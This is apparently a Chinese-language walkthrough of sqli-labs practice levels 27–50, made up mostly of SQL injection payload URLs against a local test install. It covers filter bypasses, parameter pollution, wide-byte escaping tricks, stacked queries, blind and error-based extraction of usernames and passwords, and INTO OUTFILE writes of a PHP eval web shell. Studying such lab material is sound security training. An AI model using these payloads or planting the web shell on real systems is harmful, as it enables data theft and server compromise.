less-27
- 比上一关多加了对 union / select 的过滤(看起来只是黑名单了几种固定大小写的写法,空格也仍然被过滤),而 MySQL 关键字本身不区分大小写,所以用 seLect、uniOn 这类混合大小写就能绕过,空格继续用括号代替
#判断正确
http://localhost/sqli-labs-7.2/Less-27/?id=1'=(left((seLect(group_concat(@@version))),1)='5')='1
#判断错误
http://localhost/sqli-labs-7.2/Less-27/?id=1'=(left((seLect(group_concat(@@version))),1)='a')='1
less-27a
less-28
- 跟 27 关基本一样,只是闭合符变成了 ('…'),而且不再单独过滤 select,看起来只拦 union 和 select 连在一起的组合;下面的 payload 仍然走 '1'=(…)='1' 这种不需要 union 的比较式取数
http://localhost/sqli-labs-7.2/Less-28?id=1'=(left((seLect(group_concat(@@version))),1)='5')='1
less-28a
- 过滤条件比上一关还少,只过滤 union 后面紧跟空白再接 select 的组合(类似 union\s+select 的正则),所以把 union 和 select 之间的空格去掉、改写成 union(select …) 就能绕过,或者直接用 28 关的 payload 也行
http://localhost/sqli-labs-7.2/Less-28a?id=-1') union(select 1,2,group_concat(username) from users) %23
less-29
- HTTP 参数污染(HPP):这几关前面挂了一个跑在 Tomcat(8001 端口)上的 index.jsp 做参数校验,它只检查第一个 id;校验通过后转发给 Apache/PHP,而 PHP 的 $_GET['id'] 取的是最后一个同名参数,所以把合法值放在第一个 id、注入 payload 放在第二个 id 即可。30、31 关同理,只是闭合符分别变成 " 和 ")
#爆用户
http://127.0.0.1:8001/sqli-labs/Less-29/index.jsp?id=1&id=-2'union select 1,user(),3--+
#爆数据库名
http://127.0.0.1:8001/sqli-labs/Less-29/index.jsp?id=1&id=-2'union select 1,(select group_concat(schema_name) from information_schema.schemata),3--+
#爆数据表名
http://127.0.0.1:8001/sqli-labs/Less-29/index.jsp?id=1&id=-2'union select 1,(select group_concat(table_name) from information_schema.tables where table_schema = 'security'),3--+
#爆数据段名
http://127.0.0.1:8001/sqli-labs/Less-29/index.jsp?id=1&id=-2'union select 1,(select group_concat(column_name) from information_schema.columns where table_name = 'users'),3--+
#爆数据
http://127.0.0.1:8001/sqli-labs/Less-29/index.jsp?id=1&id=-2'union select 1,(select group_concat(username) from users),3--+
http://127.0.0.1:8001/sqli-labs/Less-29/index.jsp?id=1&id=-2'union select 1,(select group_concat(password) from users),3--+
less-30
http://127.0.0.1:8001/sqli-labs/Less-30/index.jsp?id=1&id=-2"union select 1,(select group_concat(password) from users),3--+
less-31
http://127.0.0.1:8001/sqli-labs/Less-31/index.jsp?id=1&id=-2")union select 1,(select group_concat(password) from users),3--+
less-32
- 用来闭合的 ' 靠宽字节绕过(%df%27:转义时加上的 %5c 和前面的 %df 在 GBK 下拼成一个双字节字符,引号重新生效);后面 where 条件里原本要写 'security'、'users' 的地方直接用十六进制字面量(0x7365637572697479、0x7573657273),根本不出现引号,也就不会被转义
#爆用户名
http://127.0.0.1/sqli-labs/Less-32/?id=-1%df'union select 1,(user()),3--+
#爆数据库
http://127.0.0.1/sqli-labs/Less-32/?id=-1%df'union select 1,(select group_concat(schema_name) from information_schema.schemata),3--+
#爆数据表名
http://127.0.0.1/sqli-labs/Less-32/?id=-1%df'union select 1,(select group_concat(table_name) from information_schema.tables where table_schema = 0x7365637572697479),3--+
#爆数据段名
http://127.0.0.1/sqli-labs/Less-32/?id=-1%df'union select 1,(select group_concat(column_name) from information_schema.columns where table_name = 0x7573657273),3--+
#爆数据
http://127.0.0.1/sqli-labs/Less-32/?id=-1%df'union select 1,(select group_concat(username) from users),3--+
http://127.0.0.1/sqli-labs/Less-32/?id=-1%df'union select 1,(select group_concat(password) from users),3--+
less-33
less-34
- 把 utf-8 转成 utf-16 或 utf-32,例如 ' 编码成 utf-16 是 ff fe 27 00(见下面的 Python 输出),去掉末尾的 %00 后取 %ff%fe%27 放进万能密码里:原理和 %df 宽字节一样,addslashes 在 %27 前面插入的 %5c 会和前面的 %fe 在 GBK 下拼成一个双字节字符,引号重新生效,于是可以直接绕过登录
>>> '\''.encode('utf-16')
"\xff\xfe'\x00"
less-35
- 跟 33 关差不多,但 id 是数字型、没有闭合符号,所以引号会不会被 addslashes 转义无关紧要,直接用 union 注入即可
#爆数据库名
http://127.0.0.1/sqli-labs/Less-35?id=-1 union select 1,group_concat(schema_name) , 3 from information_schema.schemata %23
#爆数据库表名
http://127.0.0.1/sqli-labs/Less-35?id=-1 union select 1,group_concat(table_name) , 3 from information_schema.tables where table_schema = 0x7365637572697479 %23
#爆数据库段名
http://127.0.0.1/sqli-labs/Less-35?id=-1 union select 1,group_concat(column_name) , 3 from information_schema.columns where table_name = 0x7573657273 %23
#爆数据
http://127.0.0.1/sqli-labs/Less-35?id=-1 union select 1,group_concat(username) , 3 from users %23
http://127.0.0.1/sqli-labs/Less-35?id=-1 union select 1,group_concat(password) , 3 from users %23
less-36
- mysql_real_escape_string 只有在通过 mysql_set_charset 告诉 MySQL 当前连接字符集时才安全;这关没有把连接编码设置成 gbk,而表里的数据字段又是 gbk 编码,所以前面的 %df%27 或者 utf-16 / utf-32 编码这类宽字节技巧照样可以绕过 mysql_real_escape_string
#爆数据库名
http://127.0.0.1/sqli-labs/Less-36?id=-1%df' union select 1,group_concat(schema_name),3 from information_schema.schemata %23
less-37
uname=%ff%fe%27 or 1=1 %23 &passwd=dumb&submit=Submit
less-38
http://127.0.0.1/sqli-labs/Less-38?id=1';insert into users(id,username,password) values('17','aaa','bbb'); %23
less-39
http://127.0.0.1/sqli-labs/Less-39?id=1 ;insert into users(id,username,password) values('17','aaa','bbb'); %23
less-40
http://127.0.0.1/sqli-labs/Less-40?id=1') ;insert into users(id,username,password) values('17','aaa','bbb'); %23
less-41
- 跟39关的差别就是不报错,只能通过and 1=1和and 1=2回显来判断是否注入成功
http://127.0.0.1/sqli-labs/Less-41?id=1 ;insert into users(id,username,password) values('17','aaa','bbb'); %23
less-42
login_user=a &login_password=c';create table test(id INT,name varchar(100)) %23 ; &mysubmit=Login
less-43
login_user=a &login_password=c') ;create table test(id INT,name varchar(100)) %23 ; &mysubmit=Login
less-44
less-45
login_user=a &login_password=c') ;create table test(id INT,name varchar(100)) %23 ; &mysubmit=Login
less-46
- order by后面的注入,可以利用报错注入,延时注入
#由于版本问题,下面这种 NAME_CONST 重复列名报错只能拿到版本:NAME_CONST 要求参数是常量,version() 在部分版本里被当作常量,换成 user()、database() 之类一般会直接报 Incorrect arguments to NAME_CONST,拿不到更多信息
http://127.0.0.1/sqli-labs/Less-46/?sort=1 and (select * from (select NAME_CONST(version(),1),NAME_CONST(version(),1))x) %23
#报错注入
http://127.0.0.1/sqli-labs/Less-46?sort=(select count(*) from information_schema.columns group by concat(0x3a,0x3a,(select user()),0x3a,0x3a,floor(rand()*2))) %23
#延时注入(这里库名是 security,首字母 s 的 ascii 是 115;下面故意和 116 比较,不相等就走 sleep(1),页面延迟 1 秒说明条件分支已经生效)
http://127.0.0.1/sqli-labs/Less-46?sort=1 and if(ascii(substr(database(),1,1)) = 116 , 0 , sleep(1) ) %23
http://127.0.0.1/sqli-labs/Less-46?sort= (select if(substring(current,1,1) = char(115) , benchmark(50000000,md5('1')),null) from (select database() as current ) as tb1 ) %23
#导出文件(into outfile 需要当前数据库账号有 FILE 权限,并且 secure_file_priv 允许写到这个目录,否则会直接报错)
http://127.0.0.1/sqli-labs/Less-46?sort=1 into outfile '/Users/hacker-mao/Documents/MAMP/2.php' %23
#写文件:lines terminated by 后面的十六进制解码后是 <?php @eval($_POST["123"])?>(PHP 超全局变量名区分大小写,原先写成小写 $_post 的话 eval 根本不会执行,而且 @ 还会把报错压掉,这里已改成大写 $_POST)
http://127.0.0.1/sqli-labs/Less-46?sort=1 into outfile '/Users/hacker-mao/Documents/MAMP/3.php' lines terminated by 0x3c3f70687020406576616c28245f504f53545b22313233225d293f3e %23
less-47
#报错注入
http://127.0.0.1/sqli-labs/Less-47/?sort=1' and (select count(*) from information_schema.columns group by concat(0x3a,0x3a,(select user()),0x3a,0x3a,floor(rand()*2))) %23
#延时注入
http://127.0.0.1/sqli-labs/Less-47/?sort=1' and if(ascii(substr(database(),1,1)) = 116 , 0 , sleep(1) ) %23
#导出文件
http://127.0.0.1/sqli-labs/Less-47/?sort=1' into outfile '/Users/hacker-mao/Documents/MAMP/2.php' %23
#写文件:十六进制解码后是 <?php @eval($_POST["123"])?>,注意 $_POST 必须大写(小写 $_post 不是超全局变量,写进去的 shell 不会生效)
http://127.0.0.1/sqli-labs/Less-47?sort=1' into outfile '/Users/hacker-mao/Documents/MAMP/3.php' lines terminated by 0x3c3f70687020406576616c28245f504f53545b22313233225d293f3e %23
less-48
#延时注入
http://127.0.0.1/sqli-labs/Less-48?sort=1 and if(ascii(substr(database(),1,1)) = 116 , 0 , sleep(1) ) %23
#或者用into outfile写文件
http://127.0.0.1/sqli-labs/Less-48?sort=1 into outfile "/Users/hacker-mao/Documents/MAMP/4.php" %23
#用lines terminated by写文件(十六进制解码后是 <?php @eval($_POST["123"])?>,$_POST 必须大写,小写 $_post 不是超全局变量)
http://127.0.0.1/sqli-labs/Less-48?sort=1 into outfile '/Users/hacker-mao/Documents/MAMP/3.php' lines terminated by 0x3c3f70687020406576616c28245f504f53545b22313233225d293f3e %23
less-49
#延时注入
http://127.0.0.1/sqli-labs/Less-49?sort=1' and if(ascii(substr(database(),1,1)) = 116 , 0 , sleep(1) ) %23
#用into outfile写文件
http://127.0.0.1/sqli-labs/Less-49?sort=1' into outfile '/Users/hacker-mao/Documents/MAMP/2.php' %23
#用lines terminated by写文件
http://127.0.0.1/sqli-labs/Less-49?sort=1' into outfile '/Users/hacker-mao/Documents/MAMP/3.php' lines terminated by 0x3c3f70687020706870696e666f28293b3f3e2020 %23
less-50
- 看着跟46关差不多,主要区别就是这关使用了mysqli_multi_query()函数
#延时注入
http://127.0.0.1/sqli-labs/Less-50/?sort=1 and if(ascii(substr(database(),1,1)) = 116 , 0 , sleep(1) ) %23
http://127.0.0.1/sqli-labs/Less-50?sort= (select if(substring(current,1,1) = char(115) , benchmark(50000000,md5('1')),null) from (select database() as current ) as tb1 ) %23
#用into outfile写文件
http://127.0.0.1/sqli-labs/Less-50?sort=1 into outfile '/Users/hacker-mao/Documents/MAMP/2.php' %23
#用lines terminated by写文件
http://127.0.0.1/sqli-labs/Less-50?sort=1 into outfile '/Users/hacker-mao/Documents/MAMP/3.php' lines terminated by 0x3c3f70687020706870696e666f28293b3f3e2020 %23
- order by 处的堆叠注入(stacked injection):这关执行 sql 用的是 mysqli_multi_query(),之前各关用的是 mysqli_query();区别在于 mysqli_multi_query() 可以一次执行多条以分号分隔的 sql 语句,而 mysqli_query() 只执行一条,所以这里可以在 sort 参数后面用分号拼接新的语句,也就是之前提到的 stacked injection
http://127.0.0.1/sqli-labs/Less-50?sort=1 ; create table test like users;